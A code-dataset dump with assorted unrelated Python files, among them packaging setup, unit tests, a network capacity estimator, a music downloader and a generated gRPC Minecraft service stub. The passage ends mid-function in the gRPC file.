max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
setup.py | jaj42/infupy | 0 | 12766751 | from setuptools import setup
# Package metadata and build configuration for infupy.
setup(
    name='infupy',
    version='2022.1.11',
    description='Syringe pump infusion',
    url='https://github.com/jaj42/infupy',
    author='<NAME>',
    author_email='<EMAIL>',
    license='ISC',
    packages=['infupy', 'infupy.backends', 'infupy.gui'],
    install_requires=[
        'pyserial',
        'crcmod',
        'qtpy',
    ],
    scripts=['scripts/syre.pyw'],
)
| 0.894531 | 1 |
0x11-python-network_1/0-hbtn_status.py | ricardo1470/holbertonschool-higher_level_programming | 0 | 12766752 | <gh_stars>0
#!/usr/bin/python3
""" script that fetches https://intranet.hbtn.io/status
-You must use the package urllib
-You must use a with statement """
import urllib.request


if __name__ == '__main__':
    url = 'https://intranet.hbtn.io/status'
    # The with statement guarantees the HTTP connection is closed.
    with urllib.request.urlopen(url) as response:
        req_pag = response.read()  # raw response body as bytes
        print("Body response:")
        print("\t- type: {}".format(type(req_pag)))
        print("\t- content: {}".format(req_pag))
        # Decode the byte payload to text for human-readable display.
        print("\t- utf8 content: {}".format(req_pag.decode('utf-8')))
| 3.234375 | 3 |
pyt/__main__.py | jayvdb/pyt | 1 | 12766753 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import sys
import platform
import argparse
import os
from pyt import tester, __version__, main
from pyt.compat import *
def console():
    """Console entry point: run the pyt test runner with a usage string
    adjusted for ``python -m pyt`` invocation."""
    # ripped from unittest.__main__.py
    # When invoked as ``python -m pyt``, argv[0] is the path to
    # __main__.py; rewrite it so usage/help output shows "python -m pyt".
    if sys.argv[0].endswith("__main__.py"):
        executable = os.path.basename(sys.executable)
        sys.argv[0] = executable + " -m pyt"

    # NOTE(review): on Python 2 unittest exposes a dedicated usage string
    # for -m invocation; reuse it (is_py2 comes from pyt.compat).
    if is_py2:
        from unittest.main import USAGE_AS_MAIN
        main.USAGE = USAGE_AS_MAIN

    main(module=None)
if __name__ == "__main__":
# allow both imports of this module, for entry_points, and also running this module using python -m pyt
console()
| 2.421875 | 2 |
password_validator/tests/test_input_validator.py | sglavoie/dev-helpers | 5 | 12766754 | <gh_stars>1-10
# Standard library imports
from decimal import Decimal
from typing import Any
# Third-party libraries
import pytest
# Local imports
from pcs.input_validator import InputValidator
def test_input_is_set_to_value_passed_as_argument():
    """
    The `input` class attribute of InputValidator should be set correctly.
    """
    input_string = "test_string"
    # The validator must store the raw input unchanged.
    assert InputValidator(input_string).input == input_string
def test__raise_value_error_on_empty_input():
    """
    The tool should not accept an empty password.
    """
    # An empty string must be rejected at construction time.
    with pytest.raises(ValueError):
        assert InputValidator("")
# Parametrised over a representative sample of non-string types
# (None, bool, complex, Decimal, bytes, int, list, tuple, dict).
@pytest.mark.parametrize(
    "input_",
    [
        (None),
        (True),
        (2j),
        (Decimal(12)),
        (b"asd"),
        (12345),
        (["asd"]),
        (("asd",)),
        ({"asd": "123"}),
        ({}),
    ],
)
def test__raise_type_error_on_input_not_being_a_string(input_: Any):
    """
    The tool should not accept anything that is not a string.
    """
    # Every non-string value must be rejected with TypeError.
    with pytest.raises(TypeError):
        assert InputValidator(input_)
| 2.78125 | 3 |
showcase1/com/aaron/sysexample.py | qsunny/python | 0 | 12766755 | <reponame>qsunny/python
# -*- coding: utf-8 -*-
#from sys import argv,path,modules,exec_prefix
from sys import *
def printCommandParam():
    """Print the command-line arguments (sys.argv), one per line."""
    # argv comes from the file-level ``from sys import *``.
    print(type(argv))
    for commandParam in argv:
        print(commandParam)
def printModuleSearchPath():
"""打印模块搜索路径"""
print(type(path))
for subpath in path:
print(subpath)
def printModuleDictionary():
"""打印模块dictionary"""
for module in modules:
print(module)
def printStaticObjectInfo():
"""sys模块静态对象信息"""
#print(copyright)
print(exec_prefix)
print(executable)
print(hash_info)
print(implementation)
print(platform)
print(prefix)
print(thread_info)
print(version)
print(version_info)
# exit(2)
displayhook('a')
def print_hello():
print("export")
if __name__=="__main__" :
printCommandParam()
printModuleSearchPath()
printModuleDictionary()
#print(printCommandParam.__doc__)
printStaticObjectInfo()
| 2.28125 | 2 |
scripts/capacity.py | edwardoughton/uk_digital_networks | 0 | 12766756 | """
Capacity estimation method.
Written by <NAME>
December 12th 2019
This method can be used for any spatially aggregated unit, such as
postcode sectors or local authority districts. First, a points in
polygon analysis needs to provide the total number of 4G or 5G sites
in an area, in order to then get the density of assets. This method
then allocates the estimated capacity to the area.
"""
import os
import sys
import configparser
import csv
from itertools import tee
from collections import OrderedDict
CONFIG = configparser.ConfigParser()
CONFIG.read(os.path.join(os.path.dirname(__file__), 'script_config.ini'))
BASE_PATH = CONFIG['file_locations']['base_path']
DATA_RAW = os.path.join(BASE_PATH, 'raw')
DATA_INTERMEDIATE = os.path.join(BASE_PATH, 'intermediate')
def load_capacity_lookup_table(path):
    """
    Load a lookup table created using pysim5G:
    https://github.com/edwardoughton/pysim5g

    Returns a dict keyed by (environment, cell_type, frequency_MHz,
    bandwidth_MHz, generation) whose values are lists of
    (sites_per_km2, capacity_mbps_km2) tuples sorted by density.
    """
    lookup = {}

    with open(path, 'r') as source:
        for row in csv.DictReader(source):
            capacity = float(row["capacity_mbps_km2"])
            # Zero/negative capacities carry no information; drop them.
            if capacity <= 0:
                continue
            key = (
                row["environment"].lower(),
                row["ant_type"],
                # Convert GHz to an integer MHz string, e.g. 3.5 -> '3500'.
                str(int(float(row["frequency_GHz"]) * 1e3)),
                str(row["bandwidth_MHz"]),
                str(row["generation"]),
            )
            density = float(row["sites_per_km2"])
            lookup.setdefault(key, []).append((density, capacity))

    # Sort each (density, capacity) list by ascending site density so
    # lookup_capacity can interpolate between adjacent entries.
    for entries in lookup.values():
        entries.sort(key=lambda pair: pair[0])

    return lookup
def estimate_area_capacity(assets, area, clutter_environment,
    capacity_lookup_table, simulation_parameters):
    """
    Find the macrocellular Radio Access Network capacity given the
    area assets and deployed frequency bands.

    Parameters
    ----------
    assets : list of dict
        Site assets; each must provide 'site_ngr' and a list of deployed
        'frequency' bands.
    area : float
        Area in km^2, used to derive site density.
    clutter_environment : str
        Clutter geotype (e.g. 'urban') used as a lookup key.
    capacity_lookup_table : dict
        Table produced by load_capacity_lookup_table.
    simulation_parameters : dict
        Must contain 'channel_bandwidth_<frequency>' entries.

    Returns
    -------
    capacity : float
        Summed capacity contribution (Mbps/km^2) across all bands.
    """
    capacity = 0

    # Evaluate each supported frequency band independently and sum.
    for frequency in ['700', '800', '1800', '2600', '3500', '26000']:

        # Count distinct sites deploying this band: a site may carry
        # several bands, so de-duplicate by site reference.
        unique_sites = set()
        for asset in assets:
            for asset_frequency in asset['frequency']:
                if asset_frequency == frequency:
                    unique_sites.add(asset['site_ngr'])

        site_density = float(len(unique_sites)) / area

        bandwidth = find_frequency_bandwidth(frequency,
            simulation_parameters)

        # 700 MHz, 3.5 GHz and 26 GHz are treated as 5G bands here.
        if frequency == '700' or frequency == '3500' or frequency == '26000':
            generation = '5G'
        else:
            generation = '4G'

        if site_density > 0:
            tech_capacity = lookup_capacity(
                capacity_lookup_table,
                clutter_environment,
                'macro',
                str(frequency),
                str(bandwidth),
                generation,
                site_density,
            )
        else:
            # No sites on this band in the area: contributes nothing.
            tech_capacity = 0

        capacity += tech_capacity

    return capacity
def find_frequency_bandwidth(frequency, simulation_parameters):
    """Return the channel bandwidth configured for a frequency band.

    Parameters
    ----------
    frequency : str
        Frequency band identifier in MHz, e.g. '700' or '3500'.
    simulation_parameters : dict
        Simulation parameters; must contain a
        'channel_bandwidth_<frequency>' key for the requested band.

    Returns
    -------
    bandwidth
        The configured channel bandwidth value for the band.

    Raises
    ------
    KeyError
        If no bandwidth is configured for the requested frequency.
    """
    simulation_parameter = 'channel_bandwidth_{}'.format(frequency)

    if simulation_parameter not in simulation_parameters:
        # Bug fix: the original constructed a KeyError instance without
        # raising it, so a missing parameter fell through to the lookup
        # below and raised a bare KeyError with a less helpful message.
        raise KeyError(
            '{} not specified in simulation_parameters'.format(frequency))

    return simulation_parameters[simulation_parameter]
def pairwise(iterable):
    """
    Yield consecutive overlapping 2-tuples from *iterable*.

    >>> list(pairwise([1,2,3,4]))
    [(1,2),(2,3),(3,4)]
    """
    iterator = iter(iterable)
    # Prime with the first element; empty input yields nothing.
    previous = next(iterator, None)
    for current in iterator:
        yield (previous, current)
        previous = current
def lookup_capacity(lookup_table, environment, cell_type, frequency, bandwidth,
    generation, site_density):
    """
    Use lookup table to find capacity by clutter environment geotype,
    frequency, bandwidth, technology generation and site density.

    Linearly interpolates between the two density entries bracketing
    ``site_density``.  Returns 0 below the lowest modelled density and
    the highest modelled capacity above the highest density.

    Raises
    ------
    KeyError
        If the configuration tuple is absent from the lookup table.
    """
    key = (environment, cell_type, frequency, bandwidth, generation)

    if key not in lookup_table:
        # Bug fix: the original passed the format string and the key as
        # two separate arguments to KeyError, so the "%s" placeholder was
        # never interpolated into the message.
        raise KeyError("Combination %s not found in lookup table" % (key,))

    density_capacities = lookup_table[key]

    lowest_density, lowest_capacity = density_capacities[0]
    if site_density < lowest_density:
        # Below the lowest modelled density there is no usable capacity.
        return 0

    for lower, upper in pairwise(density_capacities):
        lower_density, lower_capacity = lower
        upper_density, upper_capacity = upper
        if lower_density <= site_density < upper_density:
            return interpolate(
                lower_density, lower_capacity,
                upper_density, upper_capacity,
                site_density
            )

    # If not caught between bounds return highest capacity
    highest_density, highest_capacity = density_capacities[-1]
    return highest_capacity
def interpolate(x0, y0, x1, y1, x):
    """
    Linearly interpolate the value at *x* on the straight line through
    the points (x0, y0) and (x1, y1).
    """
    fraction = (x - x0) / (x1 - x0)
    return y0 + (y1 - y0) * fraction
if __name__ == '__main__':

    #define parameters
    # Channel bandwidths are given in MHz, keyed by carrier frequency (MHz).
    PARAMETERS = {
        'channel_bandwidth_700': '10',
        'channel_bandwidth_800': '10',
        'channel_bandwidth_1800': '10',
        'channel_bandwidth_2600': '10',
        'channel_bandwidth_3500': '40',
        'channel_bandwidth_3700': '40',
        'channel_bandwidth_26000': '200',
        'macro_sectors': 3,
        'small-cell_sectors': 1,
        'mast_height': 30,
    }

    #define assets
    # Two example macrocell sites, each carrying 800 MHz and 2.6 GHz 4G.
    ASSETS = [
        {
            'site_ngr': 'A',
            'frequency': ['800', '2600'],
            'technology': '4G',
            'type': 'macrocell_site',
            'bandwidth': '2x10MHz',
            'build_date': 2018,
        },
        {
            'site_ngr': 'B',
            'frequency': ['800', '2600'],
            'technology': '4G',
            'type': 'macrocell_site',
            'bandwidth': '2x10MHz',
            'build_date': 2018,
        },
    ]

    path = os.path.join(DATA_RAW, 'capacity_lut_by_frequency_10.csv')
    capacity_lookup_table = load_capacity_lookup_table(path)

    # Estimate capacity for a 10 km^2 urban area and print the result.
    area_capacity = estimate_area_capacity(ASSETS, 10, 'urban',
        capacity_lookup_table, PARAMETERS)

    print(area_capacity)
| 3.390625 | 3 |
examples/fangcloud/apiserver.py | zjuchenyuan/EasyLogin | 33 | 12766757 | <reponame>zjuchenyuan/EasyLogin
#coding:utf-8
"""
使用fangcloud.py提供的download函数提供网页服务
Example:
https://api.chenyuan.me/fangcloud/448eb45f0d08cbf37c33f35419
"""
from cyserver import CYServer
from fangcloud import download
def do_GET(self):
    """HTTP GET handler: redirect /fangcloud/<id> to its download URL,
    otherwise serve the default hello page."""
    path = self.path.split("/")
    if path[1]=="fangcloud":
        try:
            # Resolve the fangcloud file id to a direct download URL and
            # answer with a 302 redirect.
            url = download(path[2])
            return self._302(url)
        except Exception as e:
            # Report the failure to the client instead of crashing the
            # handler.
            return self._fail(e)
    else:
        return self._hello()
if __name__=="__main__":
CYServer(8080,do_GET).run() | 2.328125 | 2 |
Desafio Python/Aula 10 des29.py | ayresmajor/Curso-python | 0 | 12766758 | <reponame>ayresmajor/Curso-python<filename>Desafio Python/Aula 10 des29.py
# Speeding-fine exercise: read the car's speed and, above the 80 km/h
# limit, charge a fine of 7 EUR per excess km/h.
print('\033[1:33m = \033[m' * 20)
velocidade = float(input('Qual foi a velocidade atingida pelo seu carro? '))
print('\033[1:33m - \033[m' * 20)
if velocidade <= 80:
    print('Parabéns vc não ultrapassou o limite de velocidade.')
else:
    # Compute the fine only when the limit was actually exceeded.
    multa = (velocidade - 80) * 7
    print('\033[:31mVocê ultrapassou o limite de 80km/h irá receber uma multa de \033[1:33m{:.2f}€.'.format(multa))
| 3.890625 | 4 |
tests/test_client.py | pryds/dataserv-client | 1 | 12766759 | <reponame>pryds/dataserv-client<filename>tests/test_client.py
import unittest
import datetime
import time
from dataserv_client import common
from dataserv_client import cli
from dataserv_client import api
from dataserv_client import exceptions
url = "http://127.0.0.1:5000"
address_alpha = "<KEY>"
address_beta = "<KEY>"
address_gamma = "<KEY>"
address_delta = "<KEY>"
address_zeta = "<KEY>"
address_eta = "<KEY>"
address_theta = "<KEY>"
address_iota = "<KEY>"
address_lambda = "<KEY>"
address_mu = "1DNe4PPhr6raNbADsHABGSpm6XQi7KhSTo"
address_nu = "<KEY>"
address_pi = "<KEY>"
address_omicron = "<KEY>"
address_kappa = "<KEY>"
address_ksi = "15xu7JLwqZB9ZakrfZQJF5AJpNDwWabqwA"
address_epsilon = "1FwSLAJtpLrSQp94damzWY2nK5cEBugZfC"
address_rho = "1EYtmt5QWgwATbJvnVP9G9cDXrMcX5bHJ"
address_sigma = "12qx5eKHmtwHkrpByYBdosRwUfSfbGsqhT"
address_tau = "1MfQwmCQaLRxAAij1Xii6BxFtkVvjrHPc2"
address_upsilon = "1MwWa91KJGzctsY<KEY>"
address_phi = "1LRVczz1Ln1ECom7oVotEmUVLKbxofQfKS"
address_chi = "12zhPViCGssXWiUMeGuEYgqLFr1wF1MJH9"
address_psi = "<KEY>"
address_omega = "<KEY>"
class AbstractTestSetup(object):
    """Mixin providing the shared setUp for the client test cases."""

    def setUp(self):
        time.sleep(2)  # avoid collision
class TestClientRegister(AbstractTestSetup, unittest.TestCase):
def test_register(self):
client = api.Client(address_alpha, url=url)
self.assertTrue(client.register())
def test_already_registered(self):
def callback():
client = api.Client(address_beta, url=url)
client.register()
client.register()
self.assertRaises(exceptions.AddressAlreadyRegistered, callback)
def test_invalid_address(self):
def callback():
client = api.Client("xyz", url=url)
client.register()
self.assertRaises(exceptions.InvalidAddress, callback)
def test_invalid_farmer(self):
def callback():
client = api.Client(address_nu, url=url + "/xyz")
client.register()
self.assertRaises(exceptions.FarmerNotFound, callback)
def test_address_required(self):
def callback():
api.Client().register()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientPing(AbstractTestSetup, unittest.TestCase):
def test_ping(self):
client = api.Client(address_gamma, url=url)
self.assertTrue(client.register())
self.assertTrue(client.ping())
def test_invalid_address(self):
def callback():
client = api.Client("xyz", url=url)
client.ping()
self.assertRaises(exceptions.InvalidAddress, callback)
def test_invalid_farmer(self):
def callback():
client = api.Client(address_delta, url=url + "/xyz")
client.ping()
self.assertRaises(exceptions.FarmerNotFound, callback)
def test_address_required(self):
def callback():
api.Client().ping()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientPoll(AbstractTestSetup, unittest.TestCase):
def test_poll(self):
client = api.Client(address_zeta, url=url)
self.assertTrue(client.poll(register_address=True, limit=60))
def test_address_required(self):
def callback():
api.Client().poll()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientVersion(AbstractTestSetup, unittest.TestCase):
def test_version(self):
client = api.Client(url=url)
self.assertEqual(client.version(), api.__version__)
class TestInvalidArgument(AbstractTestSetup, unittest.TestCase):
def test_invalid_retry_limit(self):
def callback():
api.Client(connection_retry_limit=-1)
self.assertRaises(exceptions.InvalidArgument, callback)
def test_invalid_retry_delay(self):
def callback():
api.Client(connection_retry_delay=-1)
self.assertRaises(exceptions.InvalidArgument, callback)
class TestConnectionRetry(AbstractTestSetup, unittest.TestCase):
def test_no_retry(self):
def callback():
client = api.Client(address=address_kappa,
url="http://invalid.url",
connection_retry_limit=0,
connection_retry_delay=0)
client.register()
before = datetime.datetime.now()
self.assertRaises(exceptions.ConnectionError, callback)
after = datetime.datetime.now()
print("NO RETRY", after - before)
self.assertTrue(datetime.timedelta(seconds=15) > (after - before))
def test_default_retry(self):
def callback():
client = api.Client(address=address_kappa,
url="http://invalid.url")
client.register()
before = datetime.datetime.now()
self.assertRaises(exceptions.ConnectionError, callback)
after = datetime.datetime.now()
print("DEFAULT RETRY", after - before)
seconds = (
common.DEFAULT_CONNECTION_RETRY_LIMIT *
common.DEFAULT_CONNECTION_RETRY_DELAY
)
self.assertTrue(datetime.timedelta(seconds=seconds) < (after - before))
class TestClientBuild(AbstractTestSetup, unittest.TestCase):
# TODO test default path
# TODO test custom path
# TODO test shard size
# TODO test if height set
# TODO test cleanup
def test_build(self):
client = api.Client(address_pi, url=url, debug=True,
max_size=1024*1024*256) # 256MB
client.register()
hashes = client.build(cleanup=True)
self.assertTrue(len(hashes) == 2)
client = api.Client(address_omicron, url=url, debug=True,
max_size=1024*1024*512) # 512MB
client.register()
hashes = client.build(cleanup=True)
self.assertTrue(len(hashes) == 4)
def test_address_required(self):
def callback():
api.Client().build()
self.assertRaises(exceptions.AddressRequired, callback)
class TestClientCliArgs(AbstractTestSetup, unittest.TestCase):
def test_poll(self):
args = [
"--address=" + address_eta,
"--url=" + url,
"poll",
"--register_address",
"--delay=5",
"--limit=60"
]
self.assertTrue(cli.main(args))
def test_register(self):
args = ["--address=" + address_theta, "--url=" + url, "register"]
self.assertTrue(cli.main(args))
def test_ping(self):
args = ["--address=" + address_iota, "--url=" + url, "register"]
self.assertTrue(cli.main(args))
args = ["--address=" + address_iota, "--url=" + url, "ping"]
self.assertTrue(cli.main(args))
def test_no_command_error(self):
def callback():
cli.main(["--address=" + address_lambda])
self.assertRaises(SystemExit, callback)
def test_input_error(self):
def callback():
cli.main([
"--address=" + address_mu,
"--url=" + url,
"poll",
"--register_address",
"--delay=5",
"--limit=xyz"
])
self.assertRaises(ValueError, callback)
def test_api_error(self):
def callback():
cli.main(["--address=xyz", "--url=" + url, "register"])
self.assertRaises(exceptions.InvalidAddress, callback)
if __name__ == '__main__':
unittest.main()
| 2.125 | 2 |
boggle/boggle_types.py | RacingTadpole/boggle | 0 | 12766760 | <gh_stars>0
from typing import Tuple, Sequence
Position = Tuple[int, int, str]
Board = Sequence[str] | 2.234375 | 2 |
confusionflow/logging/run.py | HendrikStrobelt/confusionflow | 2 | 12766761 | <reponame>HendrikStrobelt/confusionflow<filename>confusionflow/logging/run.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
from confusionflow.logging.utils import (
check_folderpath,
update_runindex,
update_datasetindex,
create_logdir,
create_dataset_config,
)
from confusionflow.logging import FoldLog
class Run:
    """
    Run is a simple wrapper for simplifying the logging of an experiment.
    """

    def __init__(self, runId, folds, trainfoldId):
        # Unique identifier for this experiment run.
        self.runId = runId
        # Dataset folds to evaluate; each must expose ``foldId`` and
        # ``dataset_config``.
        self.folds = folds
        # Identifier of the fold used for training.
        self.trainfoldId = trainfoldId
        # One FoldLog per fold, created eagerly.
        self.foldlogs = list()
        for fold in self.folds:
            foldlog = self.create_foldlog(fold.foldId)
            self.foldlogs.append(foldlog)

    def get_keras_calback(self, loss):
        # Returns a Keras callback that logs confusion data for this run.
        # NOTE(review): method name is misspelled ("calback") but kept
        # unchanged for backward compatibility with existing callers.
        from confusionflow.logging.callbacks import RunLogger
        runlogger = RunLogger(self, loss)
        return runlogger

    def export(self, logdir):
        """Write the run JSON, dataset configs and fold logs under
        *logdir* and update the run/dataset index files."""
        create_logdir(logdir)
        run_path = check_folderpath(os.path.join(logdir, "runs"))
        filepath = os.path.join(run_path, self.runId + ".json")
        with open(filepath, "w") as outfile:
            json.dump(self.asdict(), outfile)
        update_runindex(logdir)
        for fold in self.folds:
            create_dataset_config(logdir, fold.dataset_config)
        update_datasetindex(logdir)
        for foldlog in self.foldlogs:
            foldlog.export(logdir)

    def create_foldlog(self, foldId):
        """Create a FoldLog whose id combines this run's id and *foldId*."""
        foldlogId = self.runId + "_" + foldId
        return FoldLog(foldlogId, self.runId, foldId)

    def asdict(self):
        """Return a JSON-serialisable dict representation of the run."""
        d = dict()
        d["runId"] = self.runId
        d["trainfoldId"] = self.trainfoldId
        d["hyperparam"] = dict()  # placeholder; not populated yet
        d["foldlogs"] = []
        for foldlog in self.foldlogs:
            d["foldlogs"].append(foldlog.asdict())
        return d
| 2.265625 | 2 |
music_dl.py | tylors1/musicDownloader | 0 | 12766762 | import sys
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import spotipy.util as util
import codecs
import help_us
import get_spotify
import get_wikipedia
import fix_tags
import get_youtube
# client_credentials_manager = SpotifyClientCredentials(client_id='60e52fd7ef4849568a7c057416d33554', client_secret='<KEY>')
username = 'USERNAME'
scope = 'user-library-read'
# Keep track failed meta searches
open('incomplete_meta.txt', 'w').close()
open('unable_to_download.txt', 'w').close()
incomplete_meta = []
unable_to_download = []
def get_da_music(text_to_search, tag_check):
if "youtube.com" in text_to_search.strip():
text_to_search, text_to_search_corrected = get_youtube.get_video_title(text_to_search.strip()), ""
else:
text_to_search, text_to_search_corrected = help_us.correct_search(text_to_search)
duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres = get_meta_data(text_to_search, text_to_search_corrected)
if not track_name:
track_name = text_to_search_corrected if text_to_search_corrected else text_to_search
if tag_check:
duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres = fix_tags.tag_entry(duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres)
download_url = get_youtube.find_url(track_name, artist)
if not all((track_name, cover_art, artist, album, album_date, genres)):
incomplete_meta.append(text_to_search + '\n')
with open("incomplete_meta.txt", "a") as myfile:
myfile.write(text_to_search + '\n')
if not download_url:
print "Unable to download"
unable_to_download.append(track_name + " " + artist + '\n')
with open("unable_to_download.txt", "a") as myfile:
myfile.write(track_name + " " + artist + '\n')
return 0
file_name = get_youtube.youtube_download(track_name, download_url, artist)
fix_tags.set_tags(file_name, [duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres])
#Attempts spotify, then wikipedia
def get_meta_data(text_to_search, text_to_search_corrected):
    """Fetch track metadata, trying Spotify first and falling back to
    Wikipedia for release date and genres.

    Returns a 9-tuple (duration, track_name, track_id, track_number,
    cover_art, artist, album, album_date, genres); each field defaults
    to a single space when unknown.
    """
    # Initialise every field to ' ' so callers always receive 9 values.
    duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres = (' ',)*9
    duration, track_name, track_id, track_number, cover_art, artist, album = get_spotify.get_spotify_data(text_to_search, text_to_search_corrected)
    if not track_name:
        print "Unable to find meta data from spotify"
    else:
        # Only query Wikipedia once Spotify confirmed track/artist/album.
        album_date, genres = get_wikipedia.get_date_genre(track_name, artist, album)
    return duration, track_name, track_id, track_number, cover_art, artist, album, album_date, genres
def main():
while True:
print
print "Enter nothing to exit, ctrl+c to cancel script,"
print "\"file\" to enter a file name"
print
print "Song Name - Artist or youtube url"
text_to_search = raw_input()
if not text_to_search.strip():
print incomplete_meta
sys.exit()
elif text_to_search.strip() == "file":
print "File should be in current working directory. Enter file name(txt):"
file_name = raw_input()
with codecs.open(file_name, 'r') as f:
num_lines = sum(1 for line in open(file_name))
for count, line in enumerate(f):
if len(line) > 1:
print
print
print count, "of", num_lines
print line
get_da_music(line, False)
# elif text_to_search.strip() == "spotify":
# get_user_tracks('USERNAME')
else:
get_da_music(text_to_search, True)
main() | 2.734375 | 3 |
rf_command.py | glzjin/eventbridge-client-for-consumer | 0 | 12766763 | import serial
import struct
rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"]
def send_rf_command(config_class, channel, is_study = False):
    """Send a study or trigger command for *channel* over the RF serial link.

    Parameters
    ----------
    config_class : object
        Configuration object exposing a ``tty`` attribute (serial device
        path, e.g. '/dev/ttyUSB0').
    channel : int
        Zero-based index into ``rf_channel_list`` (0-3).
    is_study : bool, optional
        When True send the "study" opcode (0xAA); otherwise the normal
        trigger opcode (0xBB).
    """
    # Frame layout: <opcode> <channel byte> <0xFF terminator>.
    opcode = b"\xAA" if is_study else b"\xBB"
    frame = opcode + rf_channel_list[channel] + b"\xFF"

    # Use a context manager so the port is always closed, even if a
    # flush/write raises (the original leaked the handle on error and
    # never closed it before returning on exceptions).
    with serial.Serial(
            port = config_class.tty,
            baudrate = 9600,
            parity = serial.PARITY_NONE,
            stopbits = serial.STOPBITS_ONE,
            bytesize = serial.EIGHTBITS) as ser:
        # Clear any stale data before transmitting.
        ser.flushInput()
        ser.flushOutput()

        ser.write(frame)

        ser.flushInput()
        ser.flushOutput()
| 2.640625 | 3 |
tests.py | ranocha/nodepy | 41 | 12766764 | <reponame>ranocha/nodepy<filename>tests.py
#!/usr/bin/env python
import matplotlib
matplotlib.use('Agg')
import doctest
import nodepy
import unittest
import os
import subprocess
import tempfile
import sys
import nbformat
if sys.version_info >= (3,0):
kernel = 'python3'
else:
kernel = 'python2'
def _notebook_run(path):
    """Execute a notebook via nbconvert and collect output.

    :returns (parsed nb object, execution errors)
    """
    with tempfile.NamedTemporaryFile(suffix=".ipynb") as fout:
        # Execute the notebook in place via nbconvert, writing the
        # executed copy to the temporary file.
        args = ["jupyter", "nbconvert", "--to", "notebook", "--execute",
                "--ExecutePreprocessor.timeout=120",
                "--ExecutePreprocessor.kernel_name="+kernel,
                "--output", fout.name, path]
        subprocess.check_call(args)

        # Re-read the executed notebook from the temporary output file.
        fout.seek(0)
        nb = nbformat.reads(fout.read().decode('utf-8'), nbformat.current_nbformat)

    # Collect any error outputs across all code cells.
    errors = [output for cell in nb.cells if "outputs" in cell
              for output in cell["outputs"]
              if output.output_type == "error"]

    return nb, errors
def run_tests():
for filename in os.listdir('./examples'):
if (filename.split('.')[-1] == 'ipynb' and
filename not in ['Internal_stability_SO.ipynb',
'Introduction to NodePy.ipynb',
'stability_polynomial_speed.ipynb']):
print('running notebook: '+ filename)
_, errors = _notebook_run('./examples/'+filename)
if errors != []:
raise(Exception)
for module_name in ['runge_kutta_method',
'linear_multistep_method',
'twostep_runge_kutta_method',
'downwind_runge_kutta_method',
'ivp',
'low_storage_rk',
'rooted_trees',
'snp',
'stability_function',
'general_linear_method',
'ode_solver',
'semidisc',
'strmanip',
'utils',
'graph',
'convergence',
'loadmethod']:
module = nodepy.__getattribute__(module_name)
doctest.testmod(module)
unittest.main(module='nodepy.unit_tests',exit=False)
if __name__ == '__main__':
run_tests()
| 2.25 | 2 |
test_evocraft_py/minecraft_pb2_grpc.py | shyamsn97/test-evocraft-py | 1 | 12766765 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
import test_evocraft_py.minecraft_pb2 as minecraft__pb2
class MinecraftServiceStub(object):
"""*
The main service.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.spawnBlocks = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/spawnBlocks',
request_serializer=minecraft__pb2.Blocks.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.readCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/readCube',
request_serializer=minecraft__pb2.Cube.SerializeToString,
response_deserializer=minecraft__pb2.Blocks.FromString,
)
self.fillCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/fillCube',
request_serializer=minecraft__pb2.FillCubeRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MinecraftServiceServicer(object):
"""*
The main service.
"""
def spawnBlocks(self, request, context):
"""* Spawn multiple blocks.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def readCube(self, request, context):
"""* Return all blocks in a cube
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def fillCube(self, request, context):
"""* Fill a cube with a block type
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MinecraftServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'spawnBlocks': grpc.unary_unary_rpc_method_handler(
servicer.spawnBlocks,
request_deserializer=minecraft__pb2.Blocks.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'readCube': grpc.unary_unary_rpc_method_handler(
servicer.readCube,
request_deserializer=minecraft__pb2.Cube.FromString,
response_serializer=minecraft__pb2.Blocks.SerializeToString,
),
'fillCube': grpc.unary_unary_rpc_method_handler(
servicer.fillCube,
request_deserializer=minecraft__pb2.FillCubeRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'dk.itu.real.ooe.MinecraftService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MinecraftService(object):
"""*
The main service.
"""
@staticmethod
def spawnBlocks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/spawnBlocks',
minecraft__pb2.Blocks.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
